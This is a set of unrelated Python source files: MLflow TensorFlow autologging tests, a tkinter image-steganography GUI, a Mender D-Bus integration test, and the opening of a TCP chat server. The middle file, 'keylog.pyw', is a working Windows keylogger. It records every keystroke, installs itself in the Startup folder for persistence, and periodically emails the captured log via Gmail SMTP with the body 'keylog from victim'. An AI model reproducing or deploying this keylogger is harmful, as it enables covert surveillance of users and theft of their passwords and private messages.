return dataset.batch(batch_size)
my_feature_columns = []
for key in train.keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
feature_spec = {}
for feature in CSV_COLUMN_NAMES:
feature_spec[feature] = tf.Variable([], dtype=tf.float64, name=feature)
receiver_fn = tf.estimator.export.build_raw_serving_input_receiver_fn(feature_spec)
run_config = tf.estimator.RunConfig(
# Emit loss metrics to TensorBoard every step
save_summary_steps=1,
)
# If flag set to true, then use the v1 classifier that extends Estimator
# If flag set to false, then use the v2 classifier that extends EstimatorV2
if use_v1_estimator:
classifier = tf.compat.v1.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
else:
classifier = tf.estimator.DNNClassifier(
feature_columns=my_feature_columns,
# Two hidden layers of 10 nodes each.
hidden_units=[30, 10],
# The model must choose between 3 classes.
n_classes=3,
model_dir=directory,
config=run_config,
)
classifier.train(input_fn=lambda: input_fn(train, train_y, training=True), steps=training_steps)
if export:
classifier.export_saved_model(directory, receiver_fn)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_ends_auto_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_persists_manually_created_run(tmpdir, export):
directory = tmpdir.mkdir("test")
with mlflow.start_run() as run:
create_tf_estimator_model(str(directory), export)
assert mlflow.active_run()
assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_estimator_random_data_run(tmpdir, export):
# pylint: disable=unused-argument
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export)
client = mlflow.tracking.MlflowClient()
return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
@pytest.mark.parametrize("use_v1_estimator", [True, False])
def test_tf_estimator_autolog_logs_metrics(tmpdir, export, use_v1_estimator):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog(every_n_iter=5)
with mlflow.start_run():
create_tf_estimator_model(
str(directory), export, use_v1_estimator=use_v1_estimator, training_steps=17
)
run_id = mlflow.active_run().info.run_id
client = mlflow.tracking.MlflowClient()
run = client.get_run(run_id)
assert "loss" in run.data.metrics
assert "steps" in run.data.params
metrics = client.get_metric_history(run_id, "loss")
assert set([metric.step for metric in metrics]) == set([1, 6, 11, 16])
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_v1_autolog_can_load_from_artifact(tmpdir, export):
directory = tmpdir.mkdir("test")
mlflow.tensorflow.autolog()
create_tf_estimator_model(str(directory), export, use_v1_estimator=True)
client = mlflow.tracking.MlflowClient()
tf_estimator_v1_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
artifacts = client.list_artifacts(tf_estimator_v1_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_v1_run.info.run_id + "/model")
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_logs_tensorboard_logs(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
assert any(["tensorboard_logs" in a.path and a.is_dir for a in artifacts])
@pytest.mark.large
def test_tf_estimator_autolog_logs_metrics_in_exclusive_mode(tmpdir):
mlflow.tensorflow.autolog(exclusive=True)
create_tf_estimator_model(tmpdir, export=False)
client = mlflow.tracking.MlflowClient()
tf_estimator_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
assert "loss" in tf_estimator_run.data.metrics
assert "steps" in tf_estimator_run.data.params
metrics = client.get_metric_history(tf_estimator_run.info.run_id, "loss")
assert len(metrics) == 100
@pytest.mark.large
def test_tf_estimator_autolog_logs_metics_for_single_epoch_training(tmpdir):
"""
Epoch indexing behavior is consistent across TensorFlow 2: tf.Keras uses
zero-indexing for epochs, while other APIs (e.g., tf.Estimator) use one-indexing.
This test verifies that metrics are produced for tf.Estimator training sessions
in the boundary casewhere a model is trained for a single epoch, ensuring that
we capture metrics from the first epoch at index 1.
"""
mlflow.tensorflow.autolog()
with mlflow.start_run() as run:
create_tf_estimator_model(str(tmpdir), export=False, training_steps=1)
client = mlflow.tracking.MlflowClient()
metrics = client.get_metric_history(run.info.run_id, "loss")
assert len(metrics) == 1
assert metrics[0].step == 1
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_autolog_model_can_load_from_artifact(tf_estimator_random_data_run):
client = mlflow.tracking.MlflowClient()
artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
mlflow.tensorflow.load_model("runs:/" + tf_estimator_random_data_run.info.run_id + "/model")
@pytest.mark.large
def test_flush_queue_is_thread_safe():
"""
Autologging augments TensorBoard event logging hooks with MLflow `log_metric` API
calls. To prevent these API calls from blocking TensorBoard event logs, `log_metric`
API calls are scheduled via `_flush_queue` on a background thread. Accordingly, this test
verifies that `_flush_queue` is thread safe.
"""
from threading import Thread
from mlflow.entities import Metric
from mlflow.tensorflow import _flush_queue, _metric_queue_lock
client = mlflow.tracking.MlflowClient()
run = client.create_run(experiment_id="0")
metric_queue_item = (run.info.run_id, Metric("foo", 0.1, 100, 1))
mlflow.tensorflow._metric_queue.append(metric_queue_item)
# Verify that, if another thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue terminates and does not modify the queue
_metric_queue_lock.acquire()
flush_thread1 = Thread(target=_flush_queue)
flush_thread1.start()
flush_thread1.join()
assert len(mlflow.tensorflow._metric_queue) == 1
assert mlflow.tensorflow._metric_queue[0] == metric_queue_item
_metric_queue_lock.release()
# Verify that, if no other thread holds a lock on the metric queue leveraged by
# _flush_queue, _flush_queue flushes the queue as expected
flush_thread2 = Thread(target=_flush_queue)
flush_thread2.start()
flush_thread2.join()
assert len(mlflow.tensorflow._metric_queue) == 0
def get_text_vec_model(train_samples):
# Taken from: https://github.com/mlflow/mlflow/issues/3910
# pylint: disable=no-name-in-module
from tensorflow.keras.layers.experimental.preprocessing import TextVectorization
VOCAB_SIZE = 10
SEQUENCE_LENGTH = 16
EMBEDDING_DIM = 16
vectorizer_layer = TextVectorization(
input_shape=(1,),
max_tokens=VOCAB_SIZE,
output_mode="int",
output_sequence_length=SEQUENCE_LENGTH,
)
vectorizer_layer.adapt(train_samples)
model = tf.keras.Sequential(
[
vectorizer_layer,
tf.keras.layers.Embedding(
VOCAB_SIZE,
EMBEDDING_DIM,
name="embedding",
mask_zero=True,
input_shape=(1,),
),
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1, activation="tanh"),
]
)
model.compile(optimizer="adam", loss="mse", metrics="mae")
return model
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.3.0"),
reason=(
"Deserializing a model with `TextVectorization` and `Embedding`"
"fails in tensorflow < 2.3.0. See this issue:"
"https://github.com/tensorflow/tensorflow/issues/38250"
),
)
def test_autolog_text_vec_model(tmpdir):
"""
Verifies autolog successfully saves a model that can't be saved in the H5 format
"""
mlflow.tensorflow.autolog()
train_samples = np.array(["this is an example", "another example"])
train_labels = np.array([0.4, 0.2])
model = get_text_vec_model(train_samples)
# Saving in the H5 format should fail
with pytest.raises(NotImplementedError, match="is not supported in h5"):
model.save(tmpdir.join("model.h5").strpath, save_format="h5")
with mlflow.start_run() as run:
model.fit(train_samples, train_labels, epochs=1)
loaded_model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
np.testing.assert_array_equal(loaded_model.predict(train_samples), model.predict(train_samples))
def test_fit_generator(random_train_data, random_one_hot_labels):
mlflow.tensorflow.autolog()
model = create_tf_keras_model()
def generator():
while True:
yield random_train_data, random_one_hot_labels
with mlflow.start_run() as run:
model.fit_generator(generator(), epochs=10, steps_per_epoch=1)
run = mlflow.tracking.MlflowClient().get_run(run.info.run_id)
params = run.data.params
metrics = run.data.metrics
assert "epochs" in params
assert params["epochs"] == "10"
assert "steps_per_epoch" in params
assert params["steps_per_epoch"] == "1"
assert "accuracy" in metrics
assert "loss" in metrics
@pytest.mark.large
def test_tf_keras_model_autolog_registering_model(random_train_data, random_one_hot_labels):
registered_model_name = "test_autolog_registered_model"
mlflow.tensorflow.autolog(registered_model_name=registered_model_name)
with mlflow.start_run():
model = create_tf_keras_model()
model.fit(random_train_data, random_one_hot_labels, epochs=10)
registered_model = MlflowClient().get_registered_model(registered_model_name)
assert registered_model.name == registered_model_name
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_logs_expected_content(
random_train_data, random_one_hot_labels
):
"""
Guards against previously-exhibited issues where using the fluent `mlflow.autolog()` API with
`tf.keras` Models did not work due to conflicting patches set by both the
`mlflow.tensorflow.autolog()` and the `mlflow.keras.autolog()` APIs.
"""
mlflow.autolog()
model = create_tf_keras_model()
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, epochs=10)
client = mlflow.tracking.MlflowClient()
run_data = client.get_run(run.info.run_id).data
assert "accuracy" in run_data.metrics
assert "epochs" in run_data.params
artifacts = client.list_artifacts(run.info.run_id)
artifacts = map(lambda x: x.path, artifacts)
assert "model" in artifacts
def test_callback_is_picklable():
cb = __MLflowTfKeras2Callback(
log_models=True, metrics_logger=BatchMetricsLogger(run_id="1234"), log_every_n_steps=5
)
pickle.dumps(cb)
tb = _TensorBoard()
pickle.dumps(tb)
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.1.0"), reason="This test requires tensorflow >= 2.1.0"
)
def test_tf_keras_autolog_distributed_training(random_train_data, random_one_hot_labels):
# Ref: https://www.tensorflow.org/tutorials/distribute/keras
mlflow.tensorflow.autolog()
with tf.distribute.MirroredStrategy().scope():
model = create_tf_keras_model()
fit_params = {"epochs": 10, "batch_size": 10}
with mlflow.start_run() as run:
model.fit(random_train_data, random_one_hot_labels, **fit_params)
client = mlflow.tracking.MlflowClient()
assert client.get_run(run.info.run_id).data.params.keys() >= fit_params.keys()
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.6.0"),
reason=("TensorFlow only has a hard dependency on Keras in version >= 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_preserves_v2_model_reference():
"""
Verifies that, in TensorFlow >= 2.6.0, `tensorflow.keras.Model` refers to the correct class in
the correct module after `mlflow.autolog()` is called, guarding against previously identified
compatibility issues between recent versions of TensorFlow and MLflow's internal utility for
setting up autologging import hooks.
"""
mlflow.autolog()
import tensorflow.keras
from keras.api._v2.keras import Model as ModelV2
assert tensorflow.keras.Model is ModelV2
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tensorflow_with_fluent_autolog_enables_tf_autologging():
mlflow.autolog()
import tensorflow # pylint: disable=unused-variable,unused-import,reimported
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
# NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
# so the original keras autologging is disabled
if Version(tf.__version__) >= Version("2.6"):
import keras # pylint: disable=unused-variable,unused-import
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_tf_keras_with_fluent_autolog_enables_tf_autologging():
mlflow.autolog()
import tensorflow.keras # pylint: disable=unused-variable,unused-import
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
# NB: In Tensorflow >= 2.6, we redirect keras autologging to tensorflow autologging
# so the original keras autologging is disabled
if Version(tf.__version__) >= Version("2.6"):
# NB: For TF >= 2.6, import tensorflow.keras will trigger importing keras
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
@pytest.mark.large
@pytest.mark.skipif(
Version(tf.__version__) < Version("2.6.0"),
reason=("TensorFlow autologging is not used for vanilla Keras models in Keras < 2.6.0"),
)
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_import_keras_with_fluent_autolog_enables_tensorflow_autologging():
mlflow.autolog()
import keras # pylint: disable=unused-variable,unused-import
assert not autologging_is_disabled(mlflow.tensorflow.FLAVOR_NAME)
assert autologging_is_disabled(mlflow.keras.FLAVOR_NAME)
|
keylog.pyw
|
#first import all necessary packages
from pynput.keyboard import Key, Listener
import os
import shutil
import datetime
import winshell
from win32com.client import Dispatch
import tempfile
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import threading
import socket
#first make an folder in temp
save = tempfile.mkdtemp("screen")
print(save) #just printing the path to find out the actual path of temp
cwd = os.getcwd() #it returns current working directory
source = os.listdir() #gives list of files in current directory
#first we use datetime module to get current system-date and time base on that we save the file name
dateAndtime = datetime.datetime.now().strftime("-%Y-%m-%d-%H-%M-%S")
#now save filename with the datetime and also mention the temp folder path
filename = save+"\key_log"+dateAndtime+".txt"
open(filename,"w+")#w+ use to create the file which does not exist, creates a new file for writing.
keys=[]#use this list to store the keyboard inputs
count = 0 #used for Enther into sendmail function
countInternet = 0
word = "Key."#use to match with keyboards keys
username = os.getlogin() #looks for current username
# now first we have to create shortcut of file and store into windows startup folder
# so first create a destination path
destination = r'C:\Users\{}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'.format(username)
#now write the main method for creating shortcut file in startup folder
def main():
path = os.path.join(destination, "keylogger.pyw - Shortcut.lnk")#here set the path along it's name 7 extension
#now we have to set the link file source
target = r""+cwd+"\keylogger.pyw"
#now set the current file icon for it
icon = r""+cwd+"\keylogger.pyw"
for files in source:
if files == "keylogger.pyw":
#here we have to pass all objects we are created for sent icon,path & target etc
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(path)
shortcut.Targetpath = target
shortcut.IconLocation = icon
shortcut.save()
#it's done let's call it by writing funcation name
#we also look for it currently exit in startup folder or not
shortcut = 'keylogger.pyw - Shortcut.lnk'
if shortcut in destination:
pass
else:
main()
# also write the function to check internet connection
# so it help to call sendmail function when internet is wroking
def is_connected():
try:
socket.create_connection(("www.google.com", 80))
return True
except OSError:
pass
return False
# now write a function to send an email with an attachment
def send_email():
# first enable the less secure app persmission of sender email address.
# I'll provide link of secure app persmission in video desciption.
fromaddr = 'example@gmail.com'
toaddr = 'example@gmail.com'
password = 'yourpassword'
# instance of MIMEMultipart
msg = MIMEMultipart()
# storing the senders email address
msg['From'] = fromaddr
# storing the receivers email address
msg['To'] = toaddr
# storing the subject
msg['Subject'] = "data"
# string to store the body of the mail
body = "keylog from victim"
# attach the body with the msg instance
msg.attach(MIMEText(body, 'plain'))
# open the file to be sent
attachment = open(filename, "rb")
# instance of MIMEBase and named as part
part = MIMEBase('application', 'octet-stream')
# To change the payload into encoded form
part.set_payload((attachment).read())
# encode into base64
encoders.encode_base64(part)
part.add_header('Content-Disposition', "attachment; filename= %s" % filename)
# attach the instance 'part' to instance 'msg'
msg.attach(part)
# creates SMTP session
server = smtplib.SMTP('smtp.gmail.com', 587)
# start TLS for security
server.starttls()
# Authentication
server.login(fromaddr, password)
# Converts the Multipart msg into a string
text = msg.as_string()
# sending the mail
server.sendmail(fromaddr, toaddr, text)
# terminating the session
server.quit()
#now write the write_file method which
def write_file(keys):
with open(filename,"a") as f:
for key in keys:#we look for its keys and base on that perform an actions.
if key == 'Key.enter':#for enter it write a new line.
f.write("\n")
elif key == 'Key.space':#for space it will enter a space
f.write(key.replace("Key.space"," "))
elif key == 'Key.backspace':#for backspace it will enter a $
f.write(key.replace("Key.backspace","$")) # EX. well$come --> welcome (Actual word) , another example hellll$$$o --> helo (actual word) [hope it helps you to understand]
elif key[:4] == word:#for others we just pass no need to store
pass
else:#else for remaning words we write into the file.
f.write(key.replace("'",""))
# now write an function which takes key as a parameter
def on_press(key):
global keys, count, countInternet, filename
# now append key into list as a string
keys.append(str(key))
# and check list length base on length of list we write an key into txt file
if len(keys) > 10:
#here call write_file a function which takes list (keys) as a parament
write_file(keys)
# now write an if else condition to check internet connection and if its true then call the sendmail function.
if is_connected():
count += 1 #we are going to increment so so once its reach to 100 its called the sendmail function
#print('connected {}'.format(count))#just printing to monitor counting
if count > 100:
count = 0 # make it zero again so its start from begining
#now call the sendmail function by Thread bcoz it take time and we don't want to miss user keyboard input.
t1 = threading.Thread(target=send_email, name='t1')
t1.start()#now call by start
else:
# else condition exec when internet connection is not working
countInternet += 1
# printing the status for monitor
#print('not connected',countInternet)
# once internet connection is not working then it will not send file to email
# now we have to copy file from temp folder to current directory so it is easily accessible instead of looking in temp folder manually
if countInternet > 10:
countInternet = 0
filename = filename.strip(save) # here we strip the path only and get file name
# now look for txt file in temp folder
for files in save:
if files == filename:
shutil.copy(files+"t",source)#when we strip the path but it also strip the last letter 't' from extension so add it once again.
#and end of if else block consition clear the list so its ready to capture/save other keys.
keys.clear()
#write an instance of Listener and define the on_press method in a with statement and then join the instance to the main thread.
with Listener(on_press=on_press) as listener:
listener.join()
#that's it
|
main.py
|
# ============================================================================================
# MIT License
# Copyright (c) 2020 Konstantinos Bourantas
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ============================================================================================
import lsbSteg
import tkinter as tk
import tkinter.ttk as ttk
from tkinter.filedialog import askdirectory
from tkinter import filedialog
import threading
from ttkthemes import ThemedTk
import sys
import pyfiglet
from PIL import ImageTk, Image
# ============================================================================================
class pyHide:
def __init__(self, root, image=None):
root.minsize(700, 700)
root.title('PyHide')
# icon made by : https://www.flaticon.com/authors/becris
ico = Image.open('../icon.png')
photo = ImageTk.PhotoImage(ico)
root.wm_iconphoto(False, photo)
self.checkboxExport = None
self.exportOpt = 0
self.imagePath = None
self.root = root
self.frame = ttk.Frame(root)
self.frame.grid(row=0, column=1, rowspan=5, pady=30, padx=10)
# -----------------------------------------------
self.dirLabel = ttk.Label(self.frame, font=25, text="Image Path:")
self.dirLabel.grid(row=0, column=0, sticky=tk.W)
self.imagePathEntry = ttk.Entry(self.frame, font=40, width="50")
self.imagePathEntry.grid(row=0, column=1)
self.passLabel = ttk.Label(self.frame, font=25, text="Password:")
self.passLabel.grid(row=1, column=0, sticky=tk.W)
self.passwordEntry = ttk.Entry(
self.frame, show="*", font=40, width="50")
self.passwordEntry.grid(row=1, column=1)
self.btnChooseDir = ttk.Button(self.frame, text="Open", width=8,
command=lambda: self.selectImage())
self.btnChooseDir.grid(row=0, column=2)
# --------------------------------------------------------------------------------------------
# radio buttons
self.radioOption = tk.StringVar(value="")
self.radioEncode = ttk.Radiobutton(
self.frame, text="Encode", variable=self.radioOption, value='Encode', command=lambda: self.radioBtnCallback('Encode'))
self.radioEncode.grid(row=2, column=0)
self.radioDecode = ttk.Radiobutton(
self.frame, text="Decode", variable=self.radioOption, value='Decode', command=lambda: self.radioBtnCallback('Decode'))
self.radioDecode.grid(row=2, column=1, sticky=tk.W)
self.textArea = tk.Text(self.frame, height=30,
width=40, bg="black", fg="purple", insertbackground="purple")
self.textArea.config(state='normal')
self.textArea.grid(row=3, column=1, columnspan=1, rowspan=2,
sticky=tk.W+tk.E+tk.N+tk.S, pady=5)
# --------------------------------------------------------------------------------------------
# ascii banner
self.ascii_banner = pyfiglet.figlet_format('pyHide')
self.textArea.insert(
tk.END, self.ascii_banner+"\n========================================================")
# --------------------------------------------------------------------------------------------
# progress bar
self.progressBar = ttk.Progressbar(
self.frame, orient="horizontal", length=550, mode="indeterminate")
# --------------------------------------------------------------------------------------------
# cancel button
self.btnCancel = ttk.Button(self.frame, text="Exit", width=8,
command=lambda: sys.exit(1))
self.btnCancel.grid(row=6, column=2, sticky=tk.W, pady=10)
root.mainloop()
# --------------------------------------------------------------------------------------------
# Buttons callbacks functions
def imageSteg(self):
"""Encode/Decode operations on selected image"""
if self.btnOpImage['text'] == 'Encode':
# Encode message to the selected image
self.textArea.insert(tk.END, "\n[*]Encoding...")
self.subThread = threading.Thread(
target=lsbSteg.encodeImage, args=(self.imagePathEntry.get(),
self.textArea.get("1.0", tk.END).split('[*]Encoding...')[0].split('[*]Enter message:')[-1], self))
self.progressBar.grid(row=5, column=1, columnspan=1, sticky=tk.W)
self.progressBar.start()
self.subThread.start()
self.root.after(100, self.checkThread)
else:
# Decode message from the selected image
self.textArea.insert(tk.END, f"\n[*]Decoding {self.imagePath}")
self.subThread = threading.Thread(
target=lsbSteg.decodeImage, args=(self.imagePathEntry.get(), self))
self.progressBar.grid(row=5, column=1, columnspan=1, sticky=tk.W)
self.progressBar.start()
self.subThread.start()
self.root.after(100, self.checkThread)
# --------------------------------------------------------------------------------------------
def checkThread(self):
if (self.subThread.is_alive()):
self.root.after(100, self.checkThread)
return
else:
self.progressBar.stop()
self.progressBar.grid_remove()
# --------------------------------------------------------------------------------------------
def radioBtnCallback(self, text):
self.textArea.delete('1.0', tk.END)
self.textArea.insert(
tk.END, self.ascii_banner+"\n========================================================")
if text == "Encode":
self.textArea.insert(tk.END, "\n[*]Enter message:")
if self.checkboxExport:
self.checkboxExport.grid_remove()
else:
self.exportOpt = tk.IntVar()
self.checkboxExport = ttk.Checkbutton(
self.frame, text="Export to file", variable=self.exportOpt)
self.checkboxExport.grid(row=2, column=2, sticky=tk.E)
self.btnOpImage = ttk.Button(self.frame, text=text, width=8,
command=lambda: self.imageSteg(), state="normal" if self.imagePath else "disabled")
self.btnOpImage.grid(row=1, column=2)
# --------------------------------------------------------------------------------------------
def selectImage(self):
"""Open an image from a directory"""
# Select the Imagename from a folder
tk.Tk().withdraw()
self.imagePath = filedialog.askopenfilename(title='Open Image')
self.imagePathEntry.delete(0, tk.END)
self.imagePathEntry.insert(tk.INSERT, self.imagePath)
# opens the image
img = Image.open(self.imagePath)
# resize the image and apply a high-quality down sampling filter
img = img.resize((200, 200), Image.ANTIALIAS)
# PhotoImage class is used to add image to widgets, icons etc
img = ImageTk.PhotoImage(img)
# create a label
self.panel = ttk.Label(self.frame, image=img)
# set the image as img
self.panel.image = img
self.panel.grid(row=3, column=0, padx=5)
try:
self.btnOpImage['state'] = 'normal'
except:
pass
# ============================================================================================
if __name__ == "__main__":
root = ThemedTk(background=True, theme="equilux")
pyHide(root)
# ============================================================================================
|
test_dbus.py
|
#!/usr/bin/python
# Copyright 2020 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
import tempfile
import time
from multiprocessing import Process
from utils.common import put_no_sftp
MENDER_CONF = """{
"InventoryPollIntervalSeconds": 5,
"RetryPollIntervalSeconds": 5,
"ServerURL": "https://docker.mender.io:8443",
"DBus": {
"Enabled": true
}
}
"""
MENDER_STATE_FILES = (
"/var/lib/mender/mender-agent.pem",
"/var/lib/mender/mender-store",
"/var/lib/mender/mender-store-lock",
)
@pytest.fixture
def setup_mender_client_dbus(request, bitbake_variables, connection):
conffile = "/data/etc/mender/mender.conf"
conffile_bkp = f"{conffile}.backup"
bdir = os.path.dirname(conffile_bkp)
result = connection.run(
f"mkdir -p {bdir} && if [ -e {conffile} ]; then cp {conffile} {conffile_bkp}; fi"
)
assert result.exited == 0
tf = tempfile.NamedTemporaryFile()
with open(tf.name, "w") as fd:
fd.write(MENDER_CONF)
put_no_sftp(tf.name, connection, remote=conffile)
hostsfile = "/data/etc/hosts"
hostsfile_bkp = f"{hostsfile}.backup"
connection.run(
f"cp {hostsfile} {hostsfile_bkp} && echo 127.0.0.1 docker.mender.io >> {hostsfile}"
)
def fin():
connection.run(
f"if [ -e {conffile_bkp} ]; then dd if={conffile_bkp} of=$(realpath {conffile}); fi"
)
connection.run(
f"if [ -e {hostsfile_bkp} ]; then dd if={hostsfile_bkp} of=$(realpath {hostsfile}); fi"
)
request.addfinalizer(fin)
@pytest.mark.usefixtures("setup_board", "bitbake_path")
@pytest.mark.not_for_machine("vexpress-qemu-flash")
class TestDBus:
# this is a portion of the JWT token served by the Mender mock server:
# see: meta-mender-ci/recipes-testing/mender-mock-server/mender-mock-server.py
JWT_TOKEN = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9."
@pytest.mark.min_mender_version("2.5.0")
def test_dbus_system_configuration_file(self, bitbake_variables, connection):
"""Test that D-Bus configuration file is correctly installed."""
output = connection.run(
"cat /usr/share/dbus-1/system.d/io.mender.AuthenticationManager.conf"
).stdout.strip()
assert "io.mender.AuthenticationManager" in output
@pytest.mark.min_mender_version("2.5.0")
def test_dbus_non_root_access(self, bitbake_variables, connection):
"""Test that only root user can access Mender DBus API."""
# This is the command that is expected to fail for non-root user
dbus_send_command = "dbus-send --system --dest=io.mender.AuthenticationManager --print-reply /io/mender/AuthenticationManager io.mender.Authentication1.GetJwtToken"
try:
connection.run("mender bootstrap", warn=True)
connection.run("systemctl start mender-client")
# Wait one state machine cycle for the D-Bus API to be available
for _ in range(12):
result = connection.run("journalctl -u mender-client")
if "Authorize failed:" in result.stdout:
break
time.sleep(5)
else:
pytest.fail("failed to detect a full state machine cycle")
result = connection.run(dbus_send_command)
assert "string" in result.stdout, result.stdout
result = connection.run(
"sudo -u mender-ci-tester %s" % dbus_send_command, warn=True
)
assert result.exited == 1
assert (
"Error org.freedesktop.DBus.Error.AccessDenied" in result.stderr
), result.stderr
finally:
connection.run("systemctl stop mender-client")
connection.run("rm -f %s" % " ".join(MENDER_STATE_FILES))
@pytest.mark.min_mender_version("2.5.0")
def test_dbus_get_jwt_token(
self, bitbake_variables, connection, setup_mender_client_dbus
):
"""Test the JWT token can be retrieved using D-Bus."""
try:
# bootstrap the client
result = connection.run("mender bootstrap --forcebootstrap")
assert result.exited == 0
# start the mender-client service
result = connection.run("systemctl start mender-client")
assert result.exited == 0
# get the JWT token via D-Bus
output = ""
for i in range(12):
result = connection.run(
"dbus-send --system --dest=io.mender.AuthenticationManager --print-reply /io/mender/AuthenticationManager io.mender.Authentication1.GetJwtToken || true"
)
if self.JWT_TOKEN in result.stdout:
output = result.stdout
break
time.sleep(5)
assert f'string "{self.JWT_TOKEN}' in output
finally:
connection.run("systemctl stop mender-client")
connection.run("rm -f %s" % " ".join(MENDER_STATE_FILES))
@pytest.mark.min_mender_version("2.5.0")
def test_dbus_fetch_jwt_token(
self, bitbake_variables, connection, second_connection, setup_mender_client_dbus
):
"""Test the JWT token can be fetched using D-Bus."""
# bootstrap the client
result = connection.run("mender bootstrap --forcebootstrap")
assert result.exited == 0
try:
# start monitoring the D-Bus
def dbus_monitor():
second_connection.run(
"dbus-monitor --system \"type='signal',interface='io.mender.Authentication1'\" > /tmp/dbus-monitor.log"
)
p = Process(target=dbus_monitor, daemon=True)
p.start()
# get the JWT token via D-Bus
try:
# start the mender-client service
result = connection.run("systemctl start mender-client")
assert result.exited == 0
# fetch the JWT token
fetched = False
for i in range(12):
result = connection.run(
"dbus-send --system --dest=io.mender.AuthenticationManager --print-reply /io/mender/AuthenticationManager io.mender.Authentication1.FetchJwtToken || true"
)
if "true" in result.stdout:
fetched = True
break
time.sleep(5)
# fetch was successful
assert fetched
# verify we received the D-Bus signal JwtTokenStateChange and that it contains the JWT token
found = False
output = ""
for i in range(12):
output = connection.run("cat /tmp/dbus-monitor.log").stdout.strip()
if (
"path=/io/mender/AuthenticationManager; interface=io.mender.Authentication1; member=JwtTokenStateChange"
in output
):
found = True
break
time.sleep(5)
assert found, output
# token is now available
result = connection.run(
"dbus-send --system --dest=io.mender.AuthenticationManager --print-reply /io/mender/AuthenticationManager io.mender.Authentication1.GetJwtToken"
)
assert result.exited == 0
output = result.stdout.strip()
assert f'string "{self.JWT_TOKEN}' in output
finally:
p.terminate()
connection.run("systemctl stop mender-client")
connection.run("rm -f /tmp/dbus-monitor.log")
finally:
connection.run("rm -f %s" % " ".join(MENDER_STATE_FILES))
|
colab_servertest.py
|
from socket import *
import sys
import threading
import time
from time import localtime
import imp
HOST = '127.0.0.1'
PORT = 1234 # 设置侦听端口
BUFSIZ = 1024
if sys.version[0] == '2':
imp.reload(sys)
sys.setdefaultencoding("utf-8")
class TcpServer():
def __init__(self):
self.ADDR = (HOST, PORT)
try:
self.STOP_CHAT = False
self.sock = socket(AF_INET, SOCK_STREAM)
print('%d is open' % PORT)
self.sock.bind(self.ADDR)
self.sock.listen(5)
